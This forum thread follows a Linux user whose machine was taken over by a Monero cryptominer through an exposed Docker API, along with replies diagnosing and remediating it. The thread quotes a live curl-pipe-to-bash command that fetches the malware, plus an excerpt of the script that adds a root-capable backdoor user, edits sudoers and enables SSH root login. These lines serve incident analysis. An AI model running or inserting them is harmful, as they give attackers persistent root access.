After repeated firefox crashes I suspect a malware infection

Firefox randomly shuts down and at the same time the cpu usage increments heavily.

I noticed that when I check what is happening with htop, there appear four new processes each of them named /var/tmp/sic/sic that take away all the cpu usage.

I checked in my /var/tmp/sic folder and discovered a package.json file that looks very suspicious to me, as it has attributes named "donate-level" and "donate-over-proxy" as well as a part '"coin":"monero"'.

I am not very experienced with linux yet and would be very thankful on any suggestions on how to further investigate this matter. I am also happy to provide any kind of logs if needed.

start firefox in safe mode

What about extensions installed ?

5 Likes

From reading this, it would come from a Firefox add-on that include a cryptominer. So checking your add-ons would be indeed a good first step.

Also, the use of package.json notes a pre-WebExtension add-on, which are not supported since Firefox 57. If you are still holding on an old Firefox (like firefox-esr52 i spot in AUR), i think it's time you switch to the latest version.

4 Likes

Can you start firefox from console?
And post the output here.

1 Like

Additionally to the posts above: some sites use cryptomining via JavaScript. A mere visit with enabled JavaScript has your machine mining for them.
This will only use cpu ressources if the site is open in your browser.

2 Likes

Thank you very much for all your comments!

I did some more research by googling parts of that package.json file,
especially one long hash, and now I am pretty sure I got hijacked
because I misconfigured docker and afterwards stupidly exposed some
ports in a public network. Everything is very well explained in this
article, that even names the specific hash I found in my
package.json. It points to a crypto currency wallet:

I think Firefox "noticed" this in some way and therefore shut down?

So I now have the problem that I do not know how to get rid of this
infection.

Every now and then four very cpu intensive processes start themselves,
this is one sample outputs of one of them on htop:

19216 root 20 411592 12808 1532 S 398,7 0,2 26:06.12 /var/tmp/sic/sic

I kann kill them manually via kill pid_number and I can remove the
sic-Folder in /var/tmp/ but they keep reappearing.

I also removed docker via the pacman remove command.

I am not sure on how to proceed with this and if this is the right
place to ask about it? If someone can tell me on how to further
investigate this, I would be very thankful!

I tried starting in safe mode without any extensions, the problem keeps appearing as described in my new reply about my crypto highjack suspicions.

I also discovered this in my htop which seems to download the Mining Software if I am not mistaken:

root 22250 0.0 0.0 7464 3060 ? Ss 15:30 0:00 /bin/sh -c curl -sL http://ix.io/1XQa | bash -s

So it seems this infection has root access, if I understand this correctly?

holy crap. that script is quite evil. It disables the firewall, adds a user with root permissions, starts sshd, etc...
It made a some cron entries which execute every xx minutes. Those are actually downloading the initiating it again and again.

You could try to reverse everything in this script (starting with removing the cron jobs), but my advice would be to reinstall your system.
Once compromised you can never be sure if you really got rid of everything.
(Also the script could have been different in the past and it could have done other nasty stuff...)

4 Likes

As with all infections: reformat and reinstall is the only sane advice.

3 Likes

Thank you! That's a depressing answer, but so I guess I learned my lesson about not loosely exposing ports ...

1 Like

This is why I think Linux is not as safe as people think. There are millions of scripts, extensions, what can harm easier them on other platform. Linux has only advantage which is that no one is using it (0,05%) do not count servers etc.

2 Likes

looking through that script will hint you towards repairing and not having to reinstall, but re-installing would definitely take care of it. your /home directories should be fine to re-use since that whole script is about adding groups/users with root privilege and changing file attributes

chattr -aiu /var/spool/cron/
chmod +700 /var/spool/cron/
chattr -auiu /var/spool/cron/root/
chmod +700 /var/spool/cron/root/
chattr -aui /var/spool/cron/root
chmod +700 /var/spool/cron/root
useradd -m -p '$1$EuTlnGKV$I6ULVhrfUCnEpFqLGFVHY0' darmok;
usermod -aG sudoers darmok;
usermod -aG darmok;
usermod -aG root darmok;
adduser darmok sudo;
echo "darmok    ALL=(ALL)       ALL" >> /etc/sudoers
sed -i 's/PermitRootLogin no/PermitRootLogin yes/g' /etc/ssh/sshd_config;

you really stepped in some sh1t, lesson learned i guess :man_shrugging:

4 Likes

"Darmok and Jalad at Tanagra" :grin:

4 Likes

or maybe this is just a PEBKAC issue, not out of ignorance or neglect but a simple human mistake.

3 Likes


:stuck_out_tongue_winking_eye:

Yes it is but not every user is code guru.

According to @moson this script has root access. Before blaming Linux we should know how this root access was achieved. Was is a security hole in Linux or was root access granted by other means, e.g. the malware is run with user privileges but the user has sudo rights on ALL without password. Some people have that setup. This would be a misconfiguration by the admin.

Before you make a judgement like this you should first know how this script got root access

5 Likes

From what I understood @ruderngespra exposed the docker REST api endpoint:

Docker provides REST APIs for management of its service, including the ability to create and start/stop containers. By default, Docker only enables Unix socket access to its REST APIs. To enable remote access to the Docker service’s REST APIs, one has to configure Docker to listen on TCP ports. The conventional ports used by Docker are 2375 and 2376 which, when enabled, would by default provide unencrypted and unauthenticated access to the docker REST APIs.

The docker service runs with root permissions...

3 Likes

Yes every malware infection is mostly users fault.

Forum kindly sponsored by